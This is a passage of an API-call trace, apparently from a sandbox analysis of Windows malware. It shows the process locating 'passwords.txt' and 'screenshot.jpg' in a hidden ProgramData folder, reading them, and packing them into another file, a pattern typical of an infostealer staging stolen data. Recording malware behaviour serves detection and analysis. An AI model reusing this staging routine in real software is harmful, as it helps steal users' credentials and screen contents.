nNumberOfBytesToWrite=0x1, lpNumberOfBytesWritten=0x19e844, lpOverlapped=0x0 | out: lpBuffer=0x19e87c*, lpNumberOfBytesWritten=0x19e844*=0x1, lpOverlapped=0x0) returned 1 [0116.454] WriteFile (in: hFile=0x358, lpBuffer=0x19e87c*, nNumberOfBytesToWrite=0x1, lpNumberOfBytesWritten=0x19e838, lpOverlapped=0x0 | out: lpBuffer=0x19e87c*, lpNumberOfBytesWritten=0x19e838*=0x1, lpOverlapped=0x0) returned 1 [0116.458] lstrcpyW (in: lpString1=0x19f088, lpString2="C:\\ProgramData\\EP87SX37HD9CG2ZMD4JQML7K1\\files" | out: lpString1="C:\\ProgramData\\EP87SX37HD9CG2ZMD4JQML7K1\\files") returned="C:\\ProgramData\\EP87SX37HD9CG2ZMD4JQML7K1\\files" [0116.458] lstrcatW (in: lpString1="C:\\ProgramData\\EP87SX37HD9CG2ZMD4JQML7K1\\files", lpString2="\\" | out: lpString1="C:\\ProgramData\\EP87SX37HD9CG2ZMD4JQML7K1\\files\\") returned="C:\\ProgramData\\EP87SX37HD9CG2ZMD4JQML7K1\\files\\" [0116.458] lstrcatW (in: lpString1="C:\\ProgramData\\EP87SX37HD9CG2ZMD4JQML7K1\\files\\", lpString2="passwords.txt" | out: lpString1="C:\\ProgramData\\EP87SX37HD9CG2ZMD4JQML7K1\\files\\passwords.txt") returned="C:\\ProgramData\\EP87SX37HD9CG2ZMD4JQML7K1\\files\\passwords.txt" [0116.458] lstrcpyW (in: lpString1=0x19f290, lpString2="" | out: lpString1="") returned="" [0116.458] lstrcatW (in: lpString1="", lpString2="\\" | out: lpString1="\\") returned="\\" [0116.458] lstrcatW (in: lpString1="\\", lpString2="passwords.txt" | out: lpString1="\\passwords.txt") returned="\\passwords.txt" [0116.458] RtlAllocateHeap (HeapHandle=0x29a0000, Flags=0x0, Size=0x80) returned 0x29a36d0 [0116.458] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\ProgramData\\EP87SX37HD9CG2ZMD4JQML7K1\\files\\passwords.txt", cchWideChar=61, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 61 [0116.458] RtlAllocateHeap (HeapHandle=0x29a0000, Flags=0x0, Size=0x3d) returned 0x29a2cd8 [0116.458] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\ProgramData\\EP87SX37HD9CG2ZMD4JQML7K1\\files\\passwords.txt", cchWideChar=61, lpMultiByteStr=0x29a2cd8, cbMultiByte=61, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\ProgramData\\EP87SX37HD9CG2ZMD4JQML7K1\\files\\passwords.txt", lpUsedDefaultChar=0x0) returned 61 [0116.458] RtlAllocateHeap (HeapHandle=0x29a0000, Flags=0x0, Size=0x40) returned 0x29a2a50 [0116.458] HeapFree (in: hHeap=0x29a0000, dwFlags=0x0, lpMem=0x29a2cd8 | out: hHeap=0x29a0000) returned 1 [0116.458] HeapFree (in: hHeap=0x29a0000, dwFlags=0x0, lpMem=0x29a36d0 | out: hHeap=0x29a0000) returned 1 [0116.459] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x19f6c0, cbMultiByte=4, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 4 [0116.459] RtlAllocateHeap (HeapHandle=0x29a0000, Flags=0x0, Size=0x8) returned 0x29a6818 [0116.459] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x19f6c0, cbMultiByte=4, lpWideCharStr=0x29a6818, cchWideChar=4 | out: lpWideCharStr="*.*") returned 4 [0116.459] HeapFree (in: hHeap=0x29a0000, dwFlags=0x0, lpMem=0x29a6818 | out: hHeap=0x29a0000) returned 1 [0116.459] PathMatchSpecW (pszFile="passwords.txt", pszSpec="*.*") returned 1 [0116.459] RtlAllocateHeap (HeapHandle=0x29a0000, Flags=0x0, Size=0x80) returned 0x29a36d0 [0116.459] RtlAllocateHeap (HeapHandle=0x29a0000, Flags=0x0, Size=0x20) returned 0x3970678 [0116.459] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\ProgramData\\EP87SX37HD9CG2ZMD4JQML7K1\\files\\passwords.txt", cchWideChar=61, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 61 [0116.459] RtlAllocateHeap (HeapHandle=0x29a0000, Flags=0x0, Size=0x3d) returned 0x29a2a08 [0116.459] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\ProgramData\\EP87SX37HD9CG2ZMD4JQML7K1\\files\\passwords.txt", cchWideChar=61, lpMultiByteStr=0x29a2a08, cbMultiByte=61, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\ProgramData\\EP87SX37HD9CG2ZMD4JQML7K1\\files\\passwords.txt", lpUsedDefaultChar=0x0) returned 61 [0116.459] RtlAllocateHeap (HeapHandle=0x29a0000, Flags=0x0, Size=0x40) returned 0x29a2a98 [0116.459] HeapFree (in: hHeap=0x29a0000, dwFlags=0x0, lpMem=0x29a2a08 | out: hHeap=0x29a0000) returned 1 [0116.459] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="\\passwords.txt", cchWideChar=15, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 15 [0116.459] RtlAllocateHeap (HeapHandle=0x29a0000, Flags=0x0, Size=0xf) returned 0x29aabe8 [0116.459] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="\\passwords.txt", cchWideChar=15, lpMultiByteStr=0x29aabe8, cbMultiByte=15, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\\passwords.txt", lpUsedDefaultChar=0x0) returned 15 [0116.459] HeapFree (in: hHeap=0x29a0000, dwFlags=0x0, lpMem=0x29aabe8 | out: hHeap=0x29a0000) returned 1 [0116.459] GetLastError () returned 0x0 [0116.459] SetLastError (dwErrCode=0x0) [0116.459] GetLastError () returned 0x0 [0116.459] SetLastError (dwErrCode=0x0) [0116.459] GetLastError () returned 0x0 [0116.459] SetLastError (dwErrCode=0x0) [0116.459] GetLastError () returned 0x0 [0116.459] SetLastError (dwErrCode=0x0) [0116.459] GetLastError () returned 0x0 [0116.460] SetLastError (dwErrCode=0x0) [0116.460] GetLastError () returned 0x0 [0116.460] SetLastError (dwErrCode=0x0) [0116.460] GetLastError () returned 0x0 [0116.460] SetLastError (dwErrCode=0x0) [0116.460] GetLastError () returned 0x0 [0116.460] SetLastError (dwErrCode=0x0) [0116.460] CreateFileA (lpFileName="C:\\ProgramData\\EP87SX37HD9CG2ZMD4JQML7K1\\files\\passwords.txt" (normalized: "c:\\programdata\\ep87sx37hd9cg2zmd4jqml7k1\\files\\passwords.txt"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x28 [0116.460] SetFilePointer (in: hFile=0x358, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x814 [0116.460] GetFileInformationByHandle (in: hFile=0x28, lpFileInformation=0x19e7dc | out: lpFileInformation=0x19e7dc) returned 1 [0116.460] GetFileSize (in: hFile=0x28, lpFileSizeHigh=0x0 | out: lpFileSizeHigh=0x0) returned 0x0 [0116.460] FileTimeToSystemTime (in: lpFileTime=0x19e79c, lpSystemTime=0x19e784 | out: lpSystemTime=0x19e784) returned 1 [0116.460] SetFilePointer (in: hFile=0x28, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0116.460] GetDesktopWindow () returned 0x10010 [0116.460] GetTickCount () returned 0x123099d [0116.460] GetLastError () returned 0x0 [0116.460] SetLastError (dwErrCode=0x0) [0116.460] GetLastError () returned 0x0 [0116.461] SetLastError (dwErrCode=0x0) [0116.461] GetLastError () returned 0x0 [0116.461] SetLastError (dwErrCode=0x0) [0116.461] GetLastError () returned 0x0 [0116.461] SetLastError (dwErrCode=0x0) [0116.461] GetLastError () returned 0x0 [0116.461] SetLastError (dwErrCode=0x0) [0116.461] GetLastError () returned 0x0 [0116.461] SetLastError (dwErrCode=0x0) [0116.461] GetLastError () returned 0x0 [0116.461] SetLastError (dwErrCode=0x0) [0116.461] GetLastError () returned 0x0 [0116.461] SetLastError (dwErrCode=0x0) [0116.461] GetLastError () returned 0x0 [0116.461] SetLastError (dwErrCode=0x0) [0116.461] GetLastError () returned 0x0 [0116.461] SetLastError (dwErrCode=0x0) [0116.461] GetLastError () returned 0x0 [0116.461] SetLastError (dwErrCode=0x0) [0116.461] GetLastError () returned 0x0 [0116.461] SetLastError (dwErrCode=0x0) [0116.461] GetLastError () returned 0x0 [0116.462] SetLastError (dwErrCode=0x0) [0116.462] ReadFile (in: hFile=0x28, lpBuffer=0x390a998, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x19e838, lpOverlapped=0x0 | out: lpBuffer=0x390a998*, lpNumberOfBytesRead=0x19e838*=0x0, lpOverlapped=0x0) returned 1 [0116.462] lstrcpyW (in: lpString1=0x19f088, lpString2="C:\\ProgramData\\EP87SX37HD9CG2ZMD4JQML7K1\\files" | out: lpString1="C:\\ProgramData\\EP87SX37HD9CG2ZMD4JQML7K1\\files") returned="C:\\ProgramData\\EP87SX37HD9CG2ZMD4JQML7K1\\files" [0116.462] lstrcatW (in: lpString1="C:\\ProgramData\\EP87SX37HD9CG2ZMD4JQML7K1\\files", lpString2="\\" | out: lpString1="C:\\ProgramData\\EP87SX37HD9CG2ZMD4JQML7K1\\files\\") returned="C:\\ProgramData\\EP87SX37HD9CG2ZMD4JQML7K1\\files\\" [0116.462] lstrcatW (in: lpString1="C:\\ProgramData\\EP87SX37HD9CG2ZMD4JQML7K1\\files\\", lpString2="screenshot.jpg" | out: lpString1="C:\\ProgramData\\EP87SX37HD9CG2ZMD4JQML7K1\\files\\screenshot.jpg") returned="C:\\ProgramData\\EP87SX37HD9CG2ZMD4JQML7K1\\files\\screenshot.jpg" [0116.462] lstrcpyW (in: lpString1=0x19f290, lpString2="" | out: lpString1="") returned="" [0116.462] lstrcatW (in: lpString1="", lpString2="\\" | out: lpString1="\\") returned="\\" [0116.462] lstrcatW (in: lpString1="\\", lpString2="screenshot.jpg" | out: lpString1="\\screenshot.jpg") returned="\\screenshot.jpg" [0116.462] RtlAllocateHeap (HeapHandle=0x29a0000, Flags=0x0, Size=0x80) returned 0x29a36d0 [0116.462] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\ProgramData\\EP87SX37HD9CG2ZMD4JQML7K1\\files\\screenshot.jpg", cchWideChar=62, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 62 [0116.462] RtlAllocateHeap (HeapHandle=0x29a0000, Flags=0x0, Size=0x3e) returned 0x29a2f18 [0116.462] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\ProgramData\\EP87SX37HD9CG2ZMD4JQML7K1\\files\\screenshot.jpg", cchWideChar=62, lpMultiByteStr=0x29a2f18, cbMultiByte=62, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\ProgramData\\EP87SX37HD9CG2ZMD4JQML7K1\\files\\screenshot.jpg", lpUsedDefaultChar=0x0) returned 62 [0116.462] RtlAllocateHeap (HeapHandle=0x29a0000, Flags=0x0, Size=0x40) returned 0x29a27c8 [0116.462] HeapFree (in: hHeap=0x29a0000, dwFlags=0x0, lpMem=0x29a2f18 | out: hHeap=0x29a0000) returned 1 [0116.462] HeapFree (in: hHeap=0x29a0000, dwFlags=0x0, lpMem=0x29a36d0 | out: hHeap=0x29a0000) returned 1 [0116.462] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x19f6c0, cbMultiByte=4, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 4 [0116.462] RtlAllocateHeap (HeapHandle=0x29a0000, Flags=0x0, Size=0x8) returned 0x29a6838 [0116.462] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x19f6c0, cbMultiByte=4, lpWideCharStr=0x29a6838, cchWideChar=4 | out: lpWideCharStr="*.*") returned 4 [0116.462] HeapFree (in: hHeap=0x29a0000, dwFlags=0x0, lpMem=0x29a6838 | out: hHeap=0x29a0000) returned 1 [0116.462] PathMatchSpecW (pszFile="screenshot.jpg", pszSpec="*.*") returned 1 [0116.462] RtlAllocateHeap (HeapHandle=0x29a0000, Flags=0x0, Size=0x80) returned 0x29a36d0 [0116.463] RtlAllocateHeap (HeapHandle=0x29a0000, Flags=0x0, Size=0x20) returned 0x39706f0 [0116.463] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\ProgramData\\EP87SX37HD9CG2ZMD4JQML7K1\\files\\screenshot.jpg", cchWideChar=62, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 62 [0116.463] RtlAllocateHeap (HeapHandle=0x29a0000, Flags=0x0, Size=0x3e) returned 0x29a2858 [0116.463] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\ProgramData\\EP87SX37HD9CG2ZMD4JQML7K1\\files\\screenshot.jpg", cchWideChar=62, lpMultiByteStr=0x29a2858, cbMultiByte=62, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\ProgramData\\EP87SX37HD9CG2ZMD4JQML7K1\\files\\screenshot.jpg", lpUsedDefaultChar=0x0) returned 62 [0116.463] RtlAllocateHeap (HeapHandle=0x29a0000, Flags=0x0, Size=0x40) returned 0x29a2930 [0116.463] HeapFree (in: hHeap=0x29a0000, dwFlags=0x0, lpMem=0x29a2858 | out: hHeap=0x29a0000) returned 1 [0116.463] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="\\screenshot.jpg", cchWideChar=16, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 16 [0116.463] RtlAllocateHeap (HeapHandle=0x29a0000, Flags=0x0, Size=0x10) returned 0x29aac48 [0116.463] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="\\screenshot.jpg", cchWideChar=16, lpMultiByteStr=0x29aac48, cbMultiByte=16, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\\screenshot.jpg", lpUsedDefaultChar=0x0) returned 16 [0116.463] HeapFree (in: hHeap=0x29a0000, dwFlags=0x0, lpMem=0x29aac48 | out: hHeap=0x29a0000) returned 1 [0116.463] GetLastError () returned 0x0 [0116.463] SetLastError (dwErrCode=0x0) [0116.463] GetLastError () returned 0x0 [0116.463] SetLastError (dwErrCode=0x0) [0116.463] GetLastError () returned 0x0 [0116.463] SetLastError (dwErrCode=0x0) [0116.463] GetLastError () returned 0x0 [0116.463] SetLastError (dwErrCode=0x0) [0116.463] GetLastError () returned 0x0 [0116.463] SetLastError (dwErrCode=0x0) [0116.463] GetLastError () returned 0x0 [0116.463] SetLastError (dwErrCode=0x0) [0116.463] GetLastError () returned 0x0 [0116.464] SetLastError (dwErrCode=0x0) [0116.464] GetLastError () returned 0x0 [0116.464] SetLastError (dwErrCode=0x0) [0116.464] CreateFileA (lpFileName="C:\\ProgramData\\EP87SX37HD9CG2ZMD4JQML7K1\\files\\screenshot.jpg" (normalized: "c:\\programdata\\ep87sx37hd9cg2zmd4jqml7k1\\files\\screenshot.jpg"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x28 [0116.464] SetFilePointer (in: hFile=0x358, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x853 [0116.464] GetFileInformationByHandle (in: hFile=0x28, lpFileInformation=0x19e7dc | out: lpFileInformation=0x19e7dc) returned 1 [0116.464] GetFileSize (in: hFile=0x28, lpFileSizeHigh=0x0 | out: lpFileSizeHigh=0x0) returned 0x2e49f [0116.464] SetFilePointer (in: hFile=0x28, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0116.464] ReadFile (in: hFile=0x28, lpBuffer=0x19e7bc, nNumberOfBytesToRead=0x2, lpNumberOfBytesRead=0x19e7c0, lpOverlapped=0x0 | out: lpBuffer=0x19e7bc*, lpNumberOfBytesRead=0x19e7c0*=0x2, lpOverlapped=0x0) returned 1 [0116.464] SetFilePointer (in: hFile=0x28, lDistanceToMove=36, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x24 [0116.464] ReadFile (in: hFile=0x28, lpBuffer=0x19e7c8, nNumberOfBytesToRead=0x4, lpNumberOfBytesRead=0x19e7c0, lpOverlapped=0x0 | out: lpBuffer=0x19e7c8*, lpNumberOfBytesRead=0x19e7c0*=0x4, lpOverlapped=0x0) returned 1 [0116.464] FileTimeToSystemTime (in: lpFileTime=0x19e79c, lpSystemTime=0x19e784 | out: lpSystemTime=0x19e784) returned 1 [0116.464] SetFilePointer (in: hFile=0x28, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0116.464] GetDesktopWindow () returned 0x10010 [0116.464] GetTickCount () returned 0x12309ad [0116.464] GetLastError () returned 0x0 [0116.464] SetLastError (dwErrCode=0x0) [0116.465] GetLastError () returned 0x0 [0116.465] SetLastError (dwErrCode=0x0) [0116.465] GetLastError () returned 0x0 [0116.465] SetLastError (dwErrCode=0x0) [0116.465] GetLastError () returned 0x0 [0116.465] SetLastError (dwErrCode=0x0) [0116.465] GetLastError () returned 0x0 [0116.465] SetLastError (dwErrCode=0x0) [0116.465] GetLastError () returned 0x0 [0116.465] SetLastError (dwErrCode=0x0) [0116.465] GetLastError () returned 0x0 [0116.465] SetLastError (dwErrCode=0x0) [0116.465] GetLastError () returned 0x0 [0116.465] SetLastError (dwErrCode=0x0) [0116.465] GetLastError () returned 0x0 [0116.465] SetLastError (dwErrCode=0x0) [0116.465] GetLastError () returned 0x0 [0116.465] SetLastError (dwErrCode=0x0) [0116.465] GetLastError () returned 0x0 [0116.466] SetLastError (dwErrCode=0x0) [0116.466] GetLastError () returned 0x0 [0116.466] SetLastError (dwErrCode=0x0) [0116.466] GetLastError () returned 0x0 [0116.466] SetLastError (dwErrCode=0x0) [0116.466] ReadFile (in: hFile=0x28, lpBuffer=0x390a998, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x19e838, lpOverlapped=0x0 | out: lpBuffer=0x390a998*, lpNumberOfBytesRead=0x19e838*=0x10000, lpOverlapped=0x0) returned 1 [0116.472] WriteFile (in: hFile=0x358, lpBuffer=0x38eba1c*, nNumberOfBytesToWrite=0x4000, lpNumberOfBytesWritten=0x19e7a0, lpOverlapped=0x0 | out: lpBuffer=0x38eba1c*, lpNumberOfBytesWritten=0x19e7a0*=0x4000, lpOverlapped=0x0) returned 1 [0116.472] WriteFile (in: hFile=0x358, lpBuffer=0x38eba1c*, nNumberOfBytesToWrite=0x4000, lpNumberOfBytesWritten=0x19e7a0, lpOverlapped=0x0 | out: lpBuffer=0x38eba1c*, lpNumberOfBytesWritten=0x19e7a0*=0x4000, lpOverlapped=0x0) returned 1 [0116.474] ReadFile (in: hFile=0x28, lpBuffer=0x3912998, nNumberOfBytesToRead=0x8000, lpNumberOfBytesRead=0x19e818, lpOverlapped=0x0 | out: lpBuffer=0x3912998*, lpNumberOfBytesRead=0x19e818*=0x8000, lpOverlapped=0x0) returned 1 [0116.475] WriteFile (in: hFile=0x358, lpBuffer=0x38eba1c*, nNumberOfBytesToWrite=0x4000, lpNumberOfBytesWritten=0x19e7a0, lpOverlapped=0x0 | out: lpBuffer=0x38eba1c*, lpNumberOfBytesWritten=0x19e7a0*=0x4000, lpOverlapped=0x0) returned 1 [0116.475] WriteFile (in: hFile=0x358, lpBuffer=0x38eba1c*, nNumberOfBytesToWrite=0x4000, lpNumberOfBytesWritten=0x19e7a0, lpOverlapped=0x0 | out: lpBuffer=0x38eba1c*, lpNumberOfBytesWritten=0x19e7a0*=0x4000, lpOverlapped=0x0) returned 1 [0116.477] ReadFile (in: hFile=0x28, lpBuffer=0x3912998, nNumberOfBytesToRead=0x8000, lpNumberOfBytesRead=0x19e818, lpOverlapped=0x0 | out: lpBuffer=0x3912998*, lpNumberOfBytesRead=0x19e818*=0x8000, lpOverlapped=0x0) returned 1 [0116.478] WriteFile (in: hFile=0x358, lpBuffer=0x38eba1c*, nNumberOfBytesToWrite=0x126, lpNumberOfBytesWritten=0x19e7c8, lpOverlapped=0x0 | out: lpBuffer=0x38eba1c*, lpNumberOfBytesWritten=0x19e7c8*=0x126, lpOverlapped=0x0) returned 1 [0116.478] WriteFile (in: hFile=0x358, lpBuffer=0x38eba1c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x19e7d8, lpOverlapped=0x0 | out: lpBuffer=0x38eba1c*, lpNumberOfBytesWritten=0x19e7d8*=0x4, lpOverlapped=0x0) returned 1 [0116.478] WriteFile (in: hFile=0x358, lpBuffer=0x390ab60*, nNumberOfBytesToWrite=0x806d, lpNumberOfBytesWritten=0x19e7cc, lpOverlapped=0x0 | out: lpBuffer=0x390ab60*, lpNumberOfBytesWritten=0x19e7cc*=0x806d, lpOverlapped=0x0) returned 1 [0116.480] ReadFile (in: hFile=0x28, lpBuffer=0x3912998, nNumberOfBytesToRead=0x8000, lpNumberOfBytesRead=0x19e818, lpOverlapped=0x0 | out: lpBuffer=0x3912998*, lpNumberOfBytesRead=0x19e818*=0x8000, lpOverlapped=0x0) returned 1 [0116.481] WriteFile (in: hFile=0x358, lpBuffer=0x38eba1c*, nNumberOfBytesToWrite=0x1, lpNumberOfBytesWritten=0x19e7c8, lpOverlapped=0x0 | out: lpBuffer=0x38eba1c*, lpNumberOfBytesWritten=0x19e7c8*=0x1, lpOverlapped=0x0) returned 1 [0116.481] WriteFile (in: hFile=0x358, lpBuffer=0x38eba1c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x19e7d8, lpOverlapped=0x0 | out: lpBuffer=0x38eba1c*, lpNumberOfBytesWritten=0x19e7d8*=0x4, lpOverlapped=0x0) returned 1 [0116.481] WriteFile (in: hFile=0x358, lpBuffer=0x390abcd*, nNumberOfBytesToWrite=0x806b, lpNumberOfBytesWritten=0x19e7cc, lpOverlapped=0x0 | out: lpBuffer=0x390abcd*, lpNumberOfBytesWritten=0x19e7cc*=0x806b, lpOverlapped=0x0) returned 1 [0116.483] ReadFile (in: hFile=0x28, lpBuffer=0x3912998, nNumberOfBytesToRead=0x8000, lpNumberOfBytesRead=0x19e818, lpOverlapped=0x0 | out: lpBuffer=0x3912998*, lpNumberOfBytesRead=0x19e818*=0x649f, lpOverlapped=0x0) returned 1 [0116.483] WriteFile (in: hFile=0x358, lpBuffer=0x38eba1c*, nNumberOfBytesToWrite=0x4000, lpNumberOfBytesWritten=0x19e7a0, lpOverlapped=0x0 | out: lpBuffer=0x38eba1c*, lpNumberOfBytesWritten=0x19e7a0*=0x4000, lpOverlapped=0x0) returned 1 [0116.484] WriteFile (in: hFile=0x358, lpBuffer=0x38eba1c*, nNumberOfBytesToWrite=0x4000, lpNumberOfBytesWritten=0x19e7a0, lpOverlapped=0x0 | out: lpBuffer=0x38eba1c*, lpNumberOfBytesWritten=0x19e7a0*=0x4000, lpOverlapped=0x0) returned 1 [0116.485] ReadFile (in: hFile=0x28, lpBuffer=0x3918e37, nNumberOfBytesToRead=0x1b61, lpNumberOfBytesRead=0x19e818, lpOverlapped=0x0 | out: lpBuffer=0x3918e37*, lpNumberOfBytesRead=0x19e818*=0x0, lpOverlapped=0x0) returned 1 [0116.485] WriteFile (in: hFile=0x358, lpBuffer=0x38eba1c*, nNumberOfBytesToWrite=0x4000, lpNumberOfBytesWritten=0x19e7a4, lpOverlapped=0x0 | out: lpBuffer=0x38eba1c*, lpNumberOfBytesWritten=0x19e7a4*=0x4000, lpOverlapped=0x0) returned 1 [0116.486] WriteFile (in: hFile=0x358, lpBuffer=0x38eba1c*, nNumberOfBytesToWrite=0x1f57, lpNumberOfBytesWritten=0x19e804, lpOverlapped=0x0 | out: lpBuffer=0x38eba1c*, lpNumberOfBytesWritten=0x19e804*=0x1f57, lpOverlapped=0x0) returned 1 [0116.486] CloseHandle (hObject=0x28) returned 1 [0116.486] SetFilePointer (in: hFile=0x358, lDistanceToMove=2131, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x853 [0116.486] WriteFile (in: hFile=0x358, lpBuffer=0x19e873*, nNumberOfBytesToWrite=0x1, lpNumberOfBytesWritten=0x19e850, lpOverlapped=0x0 | out: lpBuffer=0x19e873*, lpNumberOfBytesWritten=0x19e850*=0x1, lpOverlapped=0x0) returned 1 [0116.486] WriteFile (in: hFile=0x358, lpBuffer=0x19e873*, nNumberOfBytesToWrite=0x1, lpNumberOfBytesWritten=0x19e844, lpOverlapped=0x0 | out: lpBuffer=0x19e873*, lpNumberOfBytesWritten=0x19e844*=0x1, lpOverlapped=0x0) returned 1 [0116.486] WriteFile (in: hFile=0x358, lpBuffer=0x19e87c*, nNumberOfBytesToWrite=0x1, lpNumberOfBytesWritten=0x19e838, lpOverlapped=0x0 | out: lpBuffer=0x19e87c*, lpNumberOfBytesWritten=0x19e838*=0x1, lpOverlapped=0x0) returned 1 [0116.486] WriteFile (in: hFile=0x358, lpBuffer=0x19e87c*, nNumberOfBytesToWrite=0x1, lpNumberOfBytesWritten=0x19e82c, lpOverlapped=0x0 | out: lpBuffer=0x19e87c*, lpNumberOfBytesWritten=0x19e82c*=0x1, lpOverlapped=0x0) returned 1 [0116.486] WriteFile (in: hFile=0x358, lpBuffer=0x19e87c*, nNumberOfBytesToWrite=0x1, lpNumberOfBytesWritten=0x19e820, lpOverlapped=0x0 | out: lpBuffer=0x19e87c*, lpNumberOfBytesWritten=0x19e820*=0x1, lpOverlapped=0x0) returned 1 [0116.487] WriteFile (in: hFile=0x358, lpBuffer=0x19e87c*, nNumberOfBytesToWrite=0x1, lpNumberOfBytesWritten=0x19e814, lpOverlapped=0x0 | out: lpBuffer=0x19e87c*, lpNumberOfBytesWritten=0x19e814*=0x1, lpOverlapped=0x0) returned 1 [0116.487] WriteFile (in: hFile=0x358, lpBuffer=0x19e87c*, nNumberOfBytesToWrite=0x1, lpNumberOfBytesWritten=0x19e850, lpOverlapped=0x0 | out: lpBuffer=0x19e87c*, lpNumberOfBytesWritten=0x19e850*=0x1, lpOverlapped=0x0) returned 1 [0116.487] WriteFile (in: hFile=0x358, lpBuffer=0x19e87c*, nNumberOfBytesToWrite=0x1, lpNumberOfBytesWritten=0x19e844, lpOverlapped=0x0 | out: lpBuffer=0x19e87c*, lpNumberOfBytesWritten=0x19e844*=0x1, lpOverlapped=0x0) returned 1 [0116.487] WriteFile (in: hFile=0x358, lpBuffer=0x19e87c*, nNumberOfBytesToWrite=0x1, lpNumberOfBytesWritten=0x19e838, lpOverlapped=0x0 | out: lpBuffer=0x19e87c*, lpNumberOfBytesWritten=0x19e838*=0x1, lpOverlapped=0x0) returned 1 [0116.487] WriteFile (in: hFile=0x358, lpBuffer=0x19e87c*, nNumberOfBytesToWrite=0x1, lpNumberOfBytesWritten=0x19e82c, lpOverlapped=0x0 | out: lpBuffer=0x19e87c*, lpNumberOfBytesWritten=0x19e82c*=0x1, lpOverlapped=0x0) returned 1 [0116.487] WriteFile (in: hFile=0x358, lpBuffer=0x19e87c*, nNumberOfBytesToWrite=0x1, lpNumberOfBytesWritten=0x19e820, lpOverlapped=0x0 | out: lpBuffer=0x19e87c*, lpNumberOfBytesWritten=0x19e820*=0x1, lpOverlapped=0x0) returned 1 [0116.487] WriteFile (in: hFile=0x358, lpBuffer=0x19e87c*, nNumberOfBytesToWrite=0x1, lpNumberOfBytesWritten=0x19e814, lpOverlapped=0x0 | out: lpBuffer=0x19e87c*, lpNumberOfBytesWritten=0x19e814*=0x1, lpOverlapped=0x0) returned 1 [0116.487] WriteFile (in: hFile=0x358, lpBuffer=0x19e87c*, nNumberOfBytesToWrite=0x1, lpNumberOfBytesWritten=0x19e850, lpOverlapped=0x0 | out: lpBuffer=0x19e87c*, lpNumberOfBytesWritten=0x19e850*=0x1, lpOverlapped=0x0) returned 1 [0116.487] WriteFile (in: hFile=0x358, lpBuffer=0x19e87c*, nNumberOfBytesToWrite=0x1, lpNumberOfBytesWritten=0x19e844, lpOverlapped=0x0 